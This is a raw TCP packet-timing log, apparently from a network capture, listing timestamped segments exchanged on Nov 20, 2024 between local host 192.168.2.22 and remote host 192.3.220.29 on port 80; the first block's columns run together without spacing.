                                                                                                            Nov 20, 2024 16:58:29.891755104 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.891782999 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.894680977 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.894716024 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.894798994 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.896847963 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.896889925 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.896962881 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.898991108 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.899035931 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.899079084 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.901123047 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.901160955 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.901180983 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.904205084 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.904356003 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.904889107 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.908266068 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.908281088 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.908353090 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.909925938 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.910062075 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.910135031 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.912142992 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.912422895 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.912496090 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.914343119 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.914472103 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.914544106 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.916482925 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.916496992 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.916568041 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.967947960 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.968022108 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.968070030 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.970705032 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.970805883 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.970844030 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.971812010 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.971919060 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.971961975 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.976535082 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.976609945 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.976654053 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.978303909 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.978418112 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.978461981 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.981257915 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.981367111 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.981415033 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.985148907 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.985219002 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.985264063 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.987833977 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.987952948 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.987999916 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.988820076 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.050503016 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.050554037 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.051553011 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.051857948 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.051871061 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.051903963 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.054421902 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.054441929 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.054474115 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.056658030 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.056710005 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.056833982 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.057331085 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.057342052 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.057388067 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.060190916 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.060203075 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.060250044 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.062146902 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.062621117 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.062738895 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.063585997 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.063601017 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.063654900 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.065577984 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.065593958 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.065649986 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.066972017 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.067068100 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.067115068 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.069124937 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.069236994 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.069286108 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.074961901 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.075129032 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.075176954 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.075889111 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.076229095 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.076286077 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.078288078 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.078474998 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.078531981 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.087496996 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.087589979 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.087655067 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.088414907 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.088505983 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.088557959 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.090563059 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.090703964 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.090758085 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.092736959 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.092853069 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.092901945 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.094665051 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.094779015 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.094829082 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.095331907 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.095912933 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.095964909 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.096007109 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.097503901 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.097589970 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.097632885 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.099061012 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.099133968 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.099176884 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.100667953 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.100763083 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.100816965 CET4917880192.168.2.22192.3.220.29
Nov 20, 2024 16:58:30.102269888 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.102453947 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.102500916 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.104777098 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.104973078 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.105027914 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.107551098 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.107675076 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.107727051 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.173562050 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.173593998 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.173676968 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.175365925 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.175379992 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.175437927 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.177695036 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.177706957 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.177773952 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.179666996 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.179786921 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.179857016 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.180933952 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.180946112 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.181000948 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.182977915 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.183307886 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.183362961 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.184972048 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.184986115 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.185040951 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.187109947 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.187129974 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.187143087 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.187158108 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.187191010 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.187488079 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.187520027 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.187634945 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.187680960 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.189215899 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.189230919 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.189279079 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.194664955 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.194771051 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.194828033 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.195812941 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.196003914 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.196050882 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.198221922 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.198508024 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.198554993 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.207356930 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.207521915 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.207571983 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.208081961 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.208178043 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.208225012 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.210537910 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.210755110 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.210819006 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.212647915 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.212706089 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.212759018 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.214422941 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.214587927 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.214631081 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.215634108 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.215778112 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.215826988 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.217075109 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.217294931 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.217341900 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.218630075 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.218723059 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.218774080 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.220298052 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.220417023 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.220465899 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.221944094 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.222043037 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.222095966 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.224528074 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.224693060 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.224747896 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.227329969 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.227401018 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.227454901 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.249870062 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.250034094 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.250113964 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.250758886 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.293451071 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.293471098 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.293525934 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.294934034 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.295219898 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.295270920 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.297395945 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.297444105 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.297492981 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.299659967 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.299673080 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.299721003 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.300646067 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.300668001 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.300720930 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.302830935 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.302993059 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.303040981 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.305030107 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.305042982 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.305094004 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.307017088 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.307277918 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.307324886 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.307820082 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.307957888 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.308017015 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.309410095 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.309670925 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.309734106 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.311088085 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.311301947 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.311347961 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.315644026 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.315665960 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.315721035 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.316294909 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.316452980 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.316507101 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.317897081 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.317910910 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.317961931 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.319286108 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.319571018 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.319626093 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.320895910 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.321198940 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.321253061 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.322520971 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.322567940 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.322622061 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.324012995 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.324263096 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.324318886 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.325619936 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.325731039 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.325783968 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.327420950 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.327433109 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.327486038 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.328845978 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.328859091 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.328915119 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.330459118 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.330471039 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.330539942 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.331950903 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.332077980 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.332129002 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.333580971 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.333655119 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.333700895 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.335475922 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.335691929 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.335755110 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.337210894 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.337223053 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.337317944 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.338395119 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.338408947 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.338465929 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.339970112 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.340013027 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.340061903 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.341428995 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.341542006 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.341590881 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.343012094 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.343044996 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.343096018 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.344598055 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.344711065 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.344758987 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.346180916 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.346385956 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.346438885 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.347867966 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.347882032 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.347939014 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.349337101 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.349579096 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.349631071 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.350923061 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.351118088 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.351171970 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.352591991 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.352797031 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.352849960 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.354156971 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.354231119 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.354283094 CET  49178  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:30.355686903 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.355933905 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.355990887 CET  49178  80     192.168.2.22  192.3.220.29
